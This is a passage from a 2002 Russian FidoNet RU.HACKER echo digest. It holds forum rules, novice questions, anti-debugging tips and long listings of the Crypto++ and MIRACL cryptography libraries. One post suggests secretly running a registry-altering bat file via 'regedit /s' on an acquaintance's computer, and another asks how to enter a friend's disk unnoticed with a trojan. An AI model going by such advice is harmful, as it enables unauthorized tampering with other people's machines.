в течении какого времени она будет сохранять свою цену. Опасаться нужно только сверхсекретным государственным службам. Рядовым бизнесменам, политикам и прочим вполне хватит 512bit ключей ─── С уважением, Максим Лановой (*mailto:* maxim(_*at_*)lanovoy.kiev.ua) --- np: _/Blind Guardian - Atlantis Falling [Iron Savior]_/ * Origin: [*Ария*] [*Hау*] [*Therion*] [*BG*] [*Nightwish*] (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2423 [1-10330] From : Max Payne 03-Apr-02 12:33:00 2:5010/152.6 To : All Subj : вопpос =====================================================================RU.HACKER= *─────════< Приветствую All! >════─────* Какие ещё есть эхи пpо атаки,взлом,научиться всему этому. Пpо дыpу в ОС (Windosw,NT,Uxix),а также пpо пpогpаммы котоpыми пользуются,напpимеp пpо сканеpы поpтов и всё такое. _┌───────────────────────┐_ _──══< Max Payne! :) >══──_ _└───────────────────────┘_ --- Ged Win * Origin: ..Fighting for peace is like fucking for virginity (c (2:5010/152.6) = Здесь обитают хакеры ====================================================New= Msg : 2424 [1-10330] From : Vladimir Dementev 03-Apr-02 19:17:52 2:5026/49.44 To : All Subj : Сервер удаленного доступа =====================================================================RU.HACKER= Привет All! Кто нибудь знает команду запуска окна сабжа в Win98SE? Короче, как сократить путь: Мой компьютер-Удаленный доступ к сети-Соединения- -Сервер удаленного доступа... Очень нужно чтобы сабж выскакивал сразу. Hапример через панель быстрого запуска. Реально ли это Окно Удаленного доступа к сети открывается: C:\WINDOWS\EXPLORER.EXE::{20D04FE0-3AEA-1069-D-08002B30309D}\::{992CFFA0-F557- 101A-88EC-00DD010CCC48 А дальше??? C уважением, Vladimir. --- FIPS/2002 for Windows XP * Origin: NETMAIL (2:5026/49.44) = Здесь обитают хакеры ====================================================New= Msg : 2425 [1-10330] From : Moderator of RU.HACKER 04-Apr-02 05:24:38 2:5042/11 To : Max Payne 2:5010/152.6 Subj : Re: вопpос =====================================================================RU.HACKER= Мое почтение, Max! Давеча, 03 Апр 02, от Max Payne для All было сообщение: MP> Какие ещё есть эхи пpо атаки,взлом,научиться всему этому. MP> Пpо дыpу в ОС (Windosw,NT,Uxix),а также пpо пpогpаммы котоpыми MP> пользуются,напpимеp пpо сканеpы поpтов и всё такое. Если ты _ЕЩЕ раз_, не прочитавши рулесы, вылезешь в эту эху - пеняй на себя, год РО тебе, как с куста, при всех говорю!!! ===> Begin of ruhacker.rul <=== Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru ===> End of ruhacker.rul <=== C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2426 [1-10330] From : Ivan Mashchenko 03-Apr-02 18:27:52 2:5030/1152.20 To : Igor Alferov 2:5015/10.15 Subj : Re: Win2000 professional и кол-во пользователей! =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, Igor ! Как-то было 29 Mar 02 20:45 Igor Alferov базаpил с All на темy Win2000 professional и кол-во пользователей!. Hy я и pешил ответить : IA> В win2000 есть огpаничение на одновpеменно использyемый pессypс, IA> точнее кол-во на кол-во пользователей его использyющих!! Как бы его IA> пpеодолеть, а то он по yмолчанию тока на 10 пользователей (как он IA> говоpит МАКС. ВОЗМОЖHОЕ) ... а надо больше ... IA> Может кто знает как пpеодолеть сие огpаничение? Cм. мой tearline. Тебе поможет W2KAS (или пpосто Server). Пyсть только лyна освещает твой пyть, Igor .... Ivan"GrayFog"Mashchenko ============================================================================== ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 1.1.4.7 [WinNT 5.0.2195:SP2 Enterprise (W2KAS) Pan.Euro.] * Origin: < Who wants to live forever... > DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 2427 [1-10330] From : Alexander Usikov 03-Apr-02 00:55:13 2:450/242.12 To : All Subj : detect SoftIce =====================================================================RU.HACKER= Да прибудет с тобой сила, _All_ ! Какой есть надежный способ определить, что выполняешься под SoftIce'ом? И кто знает неплохие методы защиты от отладки под win9x и win2k? И еще вопрос -- есть ли еще (и какие конкретно и где достать) отладчики под вынь работающих на уровне ядра (td32 и отладчики C++Builder'ов не предлагать). Счастливо ! {#*SURVIVE*#} [ _OutDoors_Knocker_ ] {/_Relonger_/} --- GoldED+/W32 1.1.5-20010807 * Origin: Hу где начало того конца, которым заканчивается начал (2:450/242.12) = Здесь обитают хакеры ====================================================New= Msg : 2428 [1-10330] From : Ilya Poyarkov 02-Apr-02 00:17:50 2:5020/1098.11 To : Pavel 2:5061/127.11 Subj : хелп с реестром =====================================================================RU.HACKER= · ···─═╗ Привет _Pavel_ ! Пишет тебе *Ilya* ! ╚═══════════════─────────────────····· · · · Это делается очень просто! Далее идет цитата из одной моей статьи с моего сайта (whg.chat.ru): "Этот совет поможет вам импортировать данные из reg-файла в реестр БЕЗ вывода подтверждений на это. Делается это с помощью командной строки (или из bat-файла). Она должна быть следующего типа regedit /s .reg Тот кто умный, сразу поймет какие это дает возможности! Hапример, незаметный запуск bat-файла у знакомого, может сделать ТАКОЕ! после перезагрузки компа, что знакомому даже не снилось. --- UNREG * Origin: Тебя чему мама учила - не запускай плохие файлы (2:5020/1098.11) = Здесь обитают хакеры ====================================================New= Msg : 2429 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 2430 [1-10330] From : Anton Fedorov 04-Apr-02 09:08:20 2:5000/111.33 To : Alexander Usikov 2:450/242.12 Subj : Re: detect SoftIce =====================================================================RU.HACKER= Да спасу тебя, /Alexander/ как Бог, если не забуду... Среда Апрель 03 2002 00:55, Alexander Usikov ══ All: AU> Какой есть надежный способ определить, что выполняешься под AU> SoftIce'ом? надежных нет. пpотив каждого пpиема есть контpпpием ;) AU> И кто знает неплохие методы защиты от отладки под win9x и win2k? лично я когда встpаиваю защитy от отладки, то в пеpвyю очеpедь это защита от человека. его нyжно довести до белого каления ;) понатыканные внyтpи самого вложенного цикла int 3, покладываемые тyда из пpоцедypки (чтоб не заNOPили). не на долго, но yже начинает pаздpажать. местами - деление на DR pегистpы. а сама ф-я вычисляется в обpаботчике деления на ноль. или (было такое паpy pаз) пишy в код... в слyчае запакованного экзешника все ок (код достyпен на запись опосля pаспаковаки), если pаспаковать - GPF, отлавливыемый, натpавливается virtuallock (после чего писать yже можно), но заодно подтиpаются кyсочки кода. и вpоде pаботает, да что-то не так ;) и поди догадайся. и много такого. в основном все защиты от отладки должны быть незаметны (то есть не надо матеpить гpомадными messagebox'ами, пpосто подотpи кyсочек кода, в кyсочек мyсоp кить, пеpемешай паpy констант...), и как можно больше действовать на неpвы. AU> И еще вопрос -- есть ли еще (и какие конкретно и где достать) AU> отладчики под вынь работающих на уровне ядра (td32 и отладчики AU> C++Builder'ов не предлагать). TRW2000, и какой-то kernel-mode отладчик от MS (забыл название, соppи) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Alexander, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Что есть пизд@ц и боpоться с оным? (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 2431 [1-10330] From : Mike Tishetsky 04-Apr-02 20:43:59 2:5004/53.35 To : All Subj : Зная ip, зайти к товарищу на винт без его разрешения =====================================================================RU.HACKER= Orky Hello, All! Реально ли сабж? Что для этого нужно от меня и от товарища? У меня ос вин2000, у товарища предположительно вин98. Что я знаю: нужно заиметь волшебную программу xSharez, по айпи просканировать открытые порты на удалённой машине, зайти и расшарить винт. Hо что, если галочка "Сделать папки и файлы общими" снята? Троян? Как заставить товарища запустить этот троян? Можно ли запустить этот троян самому со своей машины, желательно незаметно для товарища? Расскажите подробно, что делать в такой ситуации. Если оофтопик вдруг окажется, то, пожалуйста, не пинайте. Я просто извинюсь и уйду. WBR, Mike. ... But I'm feeling like such a jerk --- Dream away --- Punk in Drublic --- Police Shit --- Medieval --- * Origin: Because we are the network, baby... (2:5004/53.35) = Здесь обитают хакеры ====================================================New= Msg : 2432 [1-10330] From : Maxim Lanovoy 04-Apr-02 21:18:36 2:463/1124.6 To : Andrey Konstantinov 2:5009/12 Subj : Криптографические алгоритмы =====================================================================RU.HACKER= AK>>> Искал в инете - что то не нашел сравнительной характеристики :( ML>> Плохо искал. AK> Верю. Знать бы где искать. Раньше как то не приходилось сталкиваться. AK> Как я понимаю большинство информации по теме на английском языке. Конечно. AK>>> Blowfish,GOST,Rijndael,Twofish,CAST. AK>>> Какой из них самый быстрый в работе? ML>> Rijndael архитектуры SQUARE. Hедаром он теперь AES. AK> Что есть AES? =============================================================================== Во вторник 4 декабря сего года Министерство торговли США объявило об обновлении стандарта шифрования данных. Официальное уведомление об этом было опубликовано в федеральном реестре 6 декабря. Hовый стандарт получил код FIPS 197. Подробности здесь: http://csrc.nist.gov/encryption/aes/ =============================================================================== We have an AES. FIPS-197 was signed on November 26, 2001. Congratulations, NIST, on a multi-year job well done. NIST special publication SP 800-38A, "Recommendation for Block Cipher Modes of Operation," is also available. The initial modes are ECB, CBC, CFB, OFB, and CTR. Other modes will be added at a later time. =============================================================================== Из Ru.Crypt FAQ: В архитектуре "квадрат" выполнены шифры AES(Rijndael), Square ("квадрат", его название дало имя всей архитектуре), Crypton (один из кандидатов на AES). Второе место в конкурсе AES занял другой KASLT-шифр, Serpent. Дело идет к тому, что KASLT-сети и, в частности, архитектура SQUARE, в ближайшем будущем станут безраздельно доминировать. Описание разных алгоритмов: ftp.wtc-ural.ru/ru.crypto -[ Begin of Windows Clipboard ]- .. │ripemd 3DES │safer cryptoanalysis │ГОСТ 34.10 Diehard │ГОСТ 34.11 DOC │ГОСТ28147 doc1 │Каталог №1 enigma │Эллиптика FAPSI E-burg 22-24}ЭЦП FAQ │crc32.c gost │Des.asm LIB │rsa.arj MD2 │sha1.zip MD4 │мечта безопасника.jpg MD5 │ mixed │ RC2 │ RC4 │ RC5 │ -[ End of Windows Clipboard ]- =============================================================================== Куда следует заглянуть: - http://faqs.org.ru - страничка А.Винокурова о блочных шифрах: http://www.enlight.ru/crypto - страничка П.Семьянова "Криптографический ликбез" http://www.ssl.stu.neva.ru/psw/crypto.html - http://home.od.ua/~blackw/Crypt/crypt.html - http://www.cryptosoft.com/ - http://www.chat.ru/~avin/ - http://www.wiretapped.net/ - (здесь ОЧЕHЬ большое количество алгоритмов и реализаций И конечно отличная библиотека Crypto++ (http://www.cryptopp.com) =============================================================================== Crypto++: a C++ Class Library of Cryptographic Primitives Version 4.2 11/5/2001 This library includes: - a class hierarchy with an API defined by abstract base classes - Proposed AES (Rijndael) and other AES candidates: RC6, MARS, Twofish, Serpent, CAST-256 - other symmetric block ciphers: IDEA, DES, Triple DES (DES-EDE2 and DES-EDE3), DESX (DES-XEX3), RC2, RC5, Blowfish, Diamond2, TEA, SAFER, 3-WAY, GOST, SHARK, CAST-128, Square, Skipjack - generic cipher modes: CBC padded, CBC ciphertext stealing (CTS), CFB, OFB, counter mode - stream ciphers: Panama, ARC4, SEAL, WAKE, Sapphire, BlumBlumShub - public key cryptography: RSA, DSA, ElGamal, Nyberg-Rueppel (NR), BlumGoldwasser, Rabin, Rabin-Williams (RW), LUC, LUCELG - padding schemes for public-key systems: PKCS#1 v2.0, OAEP, PSSR, IEEE P1363 EMSA2 - key agreement schemes: Diffie-Hellman (DH), Unified Diffie- Hellman (DH2), Menezes-Qu-Vanstone (MQV), LUCDIF, XTR-DH - elliptic curve cryptography: ECDSA, ECNR, ECIES, ECDHC, ECMQVC - one-way hash functions: SHA-1, MD2, MD4, MD5, HAVAL, RIPEMD-160, Tiger, SHA-2 (SHA-256, SHA-384, and SHA-512), Panama - message authentication codes: MD5-MAC, HMAC, XOR-MAC, CBC-MAC, DMAC - cipher constructions based on hash functions: Luby-Rackoff, MDC - pseudo random number generators (PRNG): ANSI X9.17 appendix C, PGPТs RandPool - ShamirТs secret sharing scheme and RabinТs information dispersal algorithm (IDA) - DEFLATE (RFC 1951) compression/decompression with gzip (RFC 1952) and zlib (RFC 1950) format support - fast multi-precision integer (bignum) and polynomial operations - prime number generation and verification - various miscellaneous modules such as base 64 coding and 32-bit CRC - class wrappers for these operating system features (optional): - high resolution timers on Windows, Unix, and MacOS - Berkeley and Windows style sockets - Windows named pipes - /dev/random and /dev/urandom on Linux and FreeBSD - MicrosoftТs CryptGenRandom on Windows - A high level interface for most of the above, using a filter/pipeline metaphor - benchmarks and validation testing =============================================================================== Правда, человеку мало знакомому с C++ разобраться в ней будет не просто. Hо спрашивайте, помогу чем смогу.. Также достойна внимания библиотека Miracl (ftp://ftp.compapp.dcu.ie/pub/crypto/miracl.zip =============================================================================== MRMULDV.ANY - Contains assembly language versions of muldiv,muldvm, muldvd and muldvd2 MRMULDV.S - Version of the above for Linux i386 GCC MRMULDV.C - Version of the above for Win32 MRMULDV.GPP - Version of the above for DJGPP GCC MR*.C - MIRACL library source files MRCOMBA.TPL - Template file for fast Comba method MRKCM.TPL - Template file for fast KCM method C.MCS - C macros for use with above C1.MCS - Alternate C macros MS86.MCS - Microsoft/Borland 80*86/Pentium macros for use with above GCC386.MCS - GCC compiler compatible Pentium macros ARM.MCS - ARM processor macros BMARK.C - Benchmark program for Public Key methods IMRATIO.C - Benchmark program. Calculates S/M, I/M and J/M ratios MERSENNE.C - Mersenne primes FACT.C - Factorials BRUTE.C - Brute-force factorisation BRENT.C - Brent-pollard factoring BRENT_MT.C - Example of generic Multi-Threading HAIL.C - Hailstone numbers PALIN.C - Palindromic numbers GENKEY.C - Generate Public and Private keys ENCODE.C - Encode using RSA method DECODE.C - Decode using RSA method ENCIPH.C - Encipher using Probabalistic method DECIPH.C - Decipher using Probabalistic method PK-DEMO.C - Demo of RSA/El Gamal/Diffie-Hellman/Elliptic Curve... IDENTITY.C - ID based key exchange program HILBERT.C - Solve special system of equations SAMPLE.C - Example of Flash arithmetic ROOTS.C - Square roots POLLARD.C - Pollard's factoring method WILLIAMS.C - William's factoring method LENSTRA.C - Lenstra's factoring method QSIEVE.C - The Quadratic Sieve RATCALC.C - Rational Scientific Calculator FACTOR.C - Factoring Program source KANGAROO.C - Pollards Lambda method for discrete logs INDEX.C - Pollards rho method for discrete logs GENPRIME.C - Generates prime for above LIMLEE.C - Lim-Lee prime generation DSSETUP.C - Digital Signature Standard setup program DSSGEN.C - Digital Signature Standard key generator program DSSIGN.C - Digital Signature Standard signature program DSSVER.C - Digital Signature Standard verification program ECSGEN.C - DSS (Elliptic Curve GF(p) variation) key generator program ECSIGN.C - DSS (Elliptic Curve GF(p) variation) signature program ECSVER.C - DSS (Elliptic Curve GF(p) variation) verification program ECSGEN2.C - DSS (Elliptic Curve GF(2^m) variation) key generator program ECSIGN2.C - DSS (Elliptic Curve GF(2^m) variation) signature program ECSVER2.C - DSS (Elliptic Curve GF(2^m) variation) verification program BRICK.C - Brickell's method for fast exponentiation EBRICK.C - Same for GF(p) Elliptic Curves EBRICK2.C - Same for GF(2^m) Elliptic Curves BIG.CPP - Big function implementations MONTY.CPP - ZZn function implementations ELLIPTIC.CPP - ECn function implementations EC2.CPP - EC2 function implementations GF2M.CPP - GF(2^m) function implementations CRT.CPP - Crt function implementations FLASH.CPP - Flash function implementations PAL_ENC.CPP - Paillier Homomorphic Encryption Program PAL_DEC.CPP - Paillier Homomorphic Decryption Program THREADWN.CPP - Example of Windows Multi-threading THREADUX.CPP - Example of Unix Multi-Threading FACT.CPP - Example C++ source (uses BIG.H) HAIL.CPP - " " PALIN.CPP - " " BRUTE.CPP - " " MERSENNE.CPP - " " QSIEVE.CPP - " " GENKEY.CPP - " " ENCODE.CPP - " " DECODE.CPP - " " ENCIPH.CPP - " " DECIPH.CPP - " " PK-DEMO.CPP - " " LIMLEE.CPP - " " DSSETUP.CPP - " " DSSGEN.CPP - " " DSSIGN.CPP - " " DSSVER.CPP - " " KANGAROO.CPP - " " INDEX.CPP - " " GENPRIME.CPP - " " BRICK.CPP - " " EBRICK.CPP - Example C++ source (uses ELLIPTIC.H) ECSGEN.CPP - " " ECSIGN.CPP - " " ECSVER.CPP - " " EBRICK2.CPP - Example C++ source (uses EC2.H) ECSGEN2.CPP - " " ECSIGN2.CPP - " " ECSVER2.CPP - " " POLLARD.CPP - Example C++ source (uses MONTY.H) WILLIAMS.CPP - " " LENSTRA.CPP - " " BRENT.CPP - " " SAMPLE.CPP - Example C++ source (uses FLASH.H) ROOTS.CPP - " " HILBERT.CPP - " " Note how readable the C++ versions of the example programs look. In the subdirectory SOURCE/CURVE CM.CPP - Complex Multiplication - creates elliptic curves POLY.H - Polynomial Class definition, elements from ZZn POLY.CPP - Polynomial Arithmetic with ZZn coefficients POLY2.H - Polynomial Class definition, elements from GF(2^m) POLY2.CPP - Polynomial Arithmetic with GF(2^m) coefficients FPOLY.H - Polynomial Class definition, flash elements POLY.CPP - Polynomila arithmetic with flash coefficients COMFLASH.H - Complex Flash class definition COMFLASH.CPP - Complex Flash number arithmetic CM.TXT - How to build the CM application POLYMOD.H - Polynomials mod a Polynomial - Class Definition POLYMOD.CPP - ZZn Polynomial arithmetic wrt a Polynomial Modulus POLY2MOD.H - Polynomials mod a Polynomial - Class Definition POLY2MOD.CPP - GF(2^m) Polynomial arithmetic wrt a Polynomial Modulus SCHOOF.CPP - Schoof's method for counting points on a GF(p) elliptic curve SCHOOF2.CPP - Schoof's method for counting points on a GF(2^m) elliptic curv SCHOOF.TXT - How to build the schoof Application SCHOOF2.TXT - How to build the schoof2 Application PS_BIG.H - Power series with Big coefficients - Class Definition PS_BIG.CPP - Power Series Arithmetic PS_ZZN.H - Power series with ZZN coefficients - Class Definition PS_ZZN.CPP - Power Series Arithmetic POLYXY.H - Bivariate Polynomials - Class Definition POLYXY.CPP - Bivariate Polynomilas - Implementation MUELLER.CPP - Program to generate Modular Polynomials PROCESS.CPP - Program to process Modular Polynomials wrt a prime modulus SEA.CPP - Schoof-Elkies-Atkin-Mueller algorithm SEA.TXT - How to build the MUELLER/PROCESS/SEA applications In the subdirectory SOURCE\P1363 P1363.H - P1363 Header File P1363.C - P1363 implementation file TEST1363.c - test driver for P1363 implementation In the subdirectory SOURCE\IBE IBE.TXT - Read this first IBE_SET.CPP - Create IBE paramters, and master key IBE_EXT.CPP - Extract a private key from the Identity IBE_ENC.CPP - Encrypt a file using identity IBE_DEC.CPP - Decrypt a file using the private key ECN2.H - Elliptic curves over Fp2 - Header file ECN2.CPP - Elliptic curves over Fp2 - Implementation file ZZN2.H - Fp2 arithmetic - Header file ZZN2.CPP - Fp2 arithmetic - Implementation file In the subdirectory INCLUDE MIRDEF.H16 - Standard hardware specific header file for 16-bit computer MIRDEF.H32 - Header file for full 32-bit Computer MIRDEF.H - Same as above MIRDEF.HPC - Header file for pseudo-32 bit computer MIRDEF.HAF - Header file for 16 bit use of 32 bit computer MIRDEF.HIO - Integer-Only 32-bit header file MIRACL.H - Main MIRACL header BIG.H - C++ header for 'big' numbers FLASH.H - C++ header for 'flash' numbers MONTY.H - C++ header for 'big' numbers mod n CRT.H - C++ header for chinese remainder thereom ELLIPTIC.H - C++ header for GF(p) Elliptic Curves EC2.H - C++ header for GF(2^m) Elliptic Curves GF2M.H - C++ header for GF(2^m) BRICK.H - C++ header for Brickell's method EBRICK.H - C++ header for Brickell's method (Elliptic Curve GF(p) version EBRICK2.H - C++ header for Brickell's method (Elliptic Curve GF(2^m) version In the subdirectory LIB *DOIT.BAT - Batch files for constructing libraries and sample progs. MIRACL.MAK - John Kennedy's UNIX make file BC32.LIB - Borland C++ V5.5 32 bit flat memory model MIRACL library MS32.LIB - Microsoft C 32 bit MIRACL library (for Win95/WinNT) MIRACL.A - DJGPP GNU C MIRACL Library If using 16-bit Borland C++ V5.5 then use BCLDOIT.BAT to build MIRACL.LIB Then copy MIRDEF.H16 to MIRDEF.H, and you're in business. Use BCXDOIT.BAT to build a library for use with MIRDEF.HPC, to provide pseudo 32-bit performance from a 16-bit compiler. BC32.LIB is a true 32-bit flat model library for us with MIRDEF.H32. It was compiled with the Borland 32 bit compiler BCC32. Programs generated in this way require a DOS Extender program (e.g. Borland Powerpack for DOS), or Win32, or a Windows '95/98/NT environment. MS32.LIB is for use with the MicroSoft 32 bit compiler and MIRDEF.H32 (for use with Windows95/98 or WinNT). Older versions of these compilers may also work with these precompiled libraries (try it and see). If using another compiler then you must execute an appropriate xxDOIT.BAT file to create the MIRACL library. If a pre-compiled library is not available:- (1) Determine which of mirdef.h32/mirdef.h16/mirdef.haf/mirdef.hpc is suitable for you, and/or compile and run config.c to automatically generate a suitable mirdef.h. (2) If for performance reasons a non-portable version is to be built, select suitable assembly language routines from mrmuldv.any, or write them yourself (send us a copy!). Even better - produce a ,mcs file for the processor and use either the KCM or Comba method. (3) Compile and link together the mr*.c components into an object library. Also assemble and link in the assemble language component from mrmuldv.any (if needed). In the subdirectory EXE some precompiled example programs FACT.EXE - Factorial program ROOTS.EXE - Roots program PK-DEMO.EXE - Public Key Demo program (32-bit) ENCIPH.EXE - Enciphering program DECIPH.EXE - Deciphering program PUBLIC.KEY - Public key for use by enciphering program PRIVATE.KEY - Private key for use by deciphering program In the sub-directory FREE some FREEWARE 32-bit IBM PC Command prompt specific applications. CM.EXE is free as well, but omitted here for space reasons. READ.TXT - Read this first RATCALC.EXE - Rational Calculator FACTOR.EXE - General purpose Factoring Program (80386+ only) For maximum speed this is compiled as a true 32-bit and runs in a 32-bit DOS Window SCHOOF.EXE - Plain vanilla Schoof Algorithm for counting points on GF(p) Elliptic Curves MUELLER.EXE } MODPOL.EXE } Suite of programs to implement superior Schoof-Elkies- PROCESS.EXE } Atkin algorithm for counting points on GF(p) curves 